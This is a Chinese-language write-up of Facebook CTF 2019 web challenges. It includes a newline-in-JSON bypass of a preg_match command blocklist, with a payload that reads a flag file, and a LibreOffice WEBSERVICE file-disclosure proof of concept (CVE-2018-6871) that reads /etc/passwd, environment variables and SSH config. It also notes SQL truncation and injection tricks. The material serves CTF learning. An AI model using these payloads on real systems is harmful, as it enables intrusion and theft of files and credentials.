facebookCTF2019
rceservice - 繞過preg_match
http://challenges.fbctf.com:8085
We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'
http://challenges.fbctf.com:8085
(This problem does not require any brute force or scanning.
We will ban your team if we detect brute force or scanning).
Web Adminstration Interface
Enter command as JSON:
比賽時候沒有做出來,復現一下,根據wp,發現它接受JSON格式的命令,不過應該是過濾了很多東西
輸入:
{“cmd”:“ls”}
Attempting to run command:
index.php
輸入各種都會
Hacking attempt detected,最後過濾規則爲:
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
}
最後就成了如何繞過preg_match
繞過preg_match的最常用方法之一是使用多行輸入,因爲preg_match僅嘗試匹配第一行。
例如:
{
"cmd": "ls /home/rceservice"
}
由於沒有檢查來過濾多行輸入,我們可以將這個確切的輸入發送到服務器並收到一個歡迎的響應:
注意在輸入的時候要{%0a"cmd":“ls /home/rceservice”%0a},最後在cat flag的時候發現沒有cat命令,WP中說是應用程序的PATH變量更改了
putenv('PATH=/home/rceservice/jail');
getflag:
http://challenges.fbctf.com:8085/?cmd={%0a%22cmd%22:%20%22/bin/cat%20/home/rceservice/flag%22%0a}
事實證明,多線JSON漏洞並不是Facebook團隊的預期解決方案。預期的解決方案涉及利用pcre的回溯和遞歸限制。如果達到此限制,preg_match可能會返回錯誤的匹配結果。
secret note keeper
Find the secret note that contains the fl4g!
http://challenges.fbctf.com:8082
Same thing but in tokyo: http://challenges3.fbctf.com:8082/
(Timeout is 5 seconds for links, flag is case insensitive)
這裏利用了CVE-2018-6871
https://www.exploit-db.com/exploits/44022
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure
https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure
從這個github上下載poc.fods
<table:table-row table:style-name="ro2">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Current user:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1" table:formula="of:="/home/" & MID(COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")) + LEN("USER="); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE("/proc/self/environ"); FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ")))-FIND("USER="; COM.MICROSOFT.WEBSERVICE("/proc/self/environ"))-LEN("USER=")) & "/"" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND(":"; [.F3]; [.E3])" office:value-type="float" office:value="689" calcext:value-type="float">
<text:p>689</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=FIND("/home"; [.F3]; FIND(":x:1000:1000:"; [.F3]))" office:value-type="float" office:value="676" calcext:value-type="float">
<text:p>676</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce2" table:formula="of:=COM.MICROSOFT.WEBSERVICE("/etc/passwd")" office:value-type="string" office:string-value="" calcext:value-type="string">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string"><text:p>(change this)</text:p><text:p>Address:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce5" office:value-type="string" calcext:value-type="string">
<text:p>http://localhost:8080</text:p>
</table:table-cell>
</table:table-row>
<table:table-row table:style-name="ro3">
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>List of private keys:</text:p>
</table:table-cell>
<table:table-cell table:style-name="ce1"/>
<table:table-cell table:number-columns-repeated="2"/>
<table:table-cell table:formula="of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & "/.ssh/config"); "~"; [.C3])" office:value-type="string" office:string-value="" calcext:value-type="error">
<text:p>#VALUE!</text:p>
</table:table-cell>
<table:table-cell/>
<table:table-cell office:value-type="string" calcext:value-type="string">
<text:p>Send:</text:p>
</table:table-cell>
<table:table-cell/>
將/etc/passwd修改爲/home/libreoffice_admin/flag上傳即可
fb{wh0_7h0u6h7_l1br30ff1c3_c4n_b3_u53ful}
products manager
使用facebook + ' '*56 + hack
了名稱,not_so_secret
祕密和hacked!!!
描述,併成功插入產品。我現在可以使用facebook
和查看產品not_so_secret
並獲得標誌。基本上,SQL忽略長度爲64之後的所有字符,默認情況下會截斷空格。
easter egg
After searching fb{
on all pages, found nothing
But searching for {
found something interesting on careers
page:
<p>Facebook's Application Security team<span style="color:white">{</span>is seeking a passionate hacker to help us secure over 2 billion users....
And searching for }
:
<p>The Oculus Security Engineering team designs, builds, and supports the infrastructure and services<span style="color:white">}</span>that allow Oculus to move fast,...
Also found <span style="color:white">f
, <span style="color:white">b
etc…
import re
text = open("careers",'r').read()
text = re.findall('''<span style="color:white">.</span>''',text)
print ''.join([t[26:-7] for t in text])
fb{we're_hiring}
events
python 模板注入
https://ramadistra.dev/fbctf-2019-events
secret note keeper
pgsql注入
異步注入
https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md